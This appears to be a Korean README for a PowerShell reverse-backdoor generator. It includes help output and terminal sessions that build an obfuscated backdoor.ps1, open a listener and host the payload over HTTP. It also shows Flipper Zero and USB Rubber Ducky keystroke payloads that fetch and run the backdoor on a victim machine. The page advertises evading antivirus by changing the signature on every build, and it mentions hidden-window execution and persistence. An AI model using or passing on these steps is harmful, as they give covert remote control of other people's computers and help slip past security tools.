
PowerShell로 작성되고 Python으로 난독화된 리버스 백도어입니다. Flipper Zero 및 Hak5 USB Rubber Ducky와 같은 인기 해킹 장치용 페이로드를 생성하며, AV 탐지를 피하기 위해 빌드할 때마다 서명을 변경합니다.
/******************************************************************************
PowerShell로 작성되고 Python으로 난독화된 리버스 백도어 도구로, 빌드할 때마다 새로운 시그니처를 제공하여 탐지를 피합니다. 이 도구는 Flipper Zero 및 Hak5 USB Rubber Ducky와 같은 인기 해킹 장치용 페이로드를 생성할 수 있습니다. 이 도구를 사용하여 고급 공격 기술에 대한 시스템의 방어를 테스트하십시오.
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]
Powershell Backdoor Generator
options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL conversion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
현재 작업 디렉토리에 backdoor.ps1이라는 파일이 생성됩니다.
Windows 11, Windows 10 및 Kali Linux에서 테스트되었습니다. 숨겨진 창으로 실행하고 지속성 액세스를 위해 다음 가이드를 따르십시오
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1
이러한 공격 중 하나를 사용하면 백도어를 호스팅하는 HTTP 서버가 열립니다. 백도어가 검색되면 HTTP 서버가 종료됩니다.
아래는 powershell_backdoor.txt라는 파일을 생성하며, Flipper에서 실행하면 HTTP를 통해 컴퓨터에서 백도어를 가져와 실행합니다.
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
지정한 텍스트 파일(예: powershell_backdoor.txt)을 Flipper Zero에 넣으십시오. 페이로드가 실행되면 backdoor.ps1을 다운로드하여 실행합니다.
아래는 Hak5 USB Rubber Ducky용 inject.bin 파일을 생성하는 방법에 대한 튜토리얼입니다.
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
inject.bin이라는 파일이 현재 작업 디렉토리에 생성됩니다. 이 기능을 사용하려면 Java가 필요합니다. 페이로드가 실행되면 backdoor.ps1을 다운로드하여 실행합니다.
USB Rubber Ducky 공격을 위해 payload.txt를 inject.bin으로 인코딩하기 위해 가 만든 encoder.jar를 사용합니다.
다음은 5번 빌드 후 backdoor.ps1의 sha1 해시입니다.
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49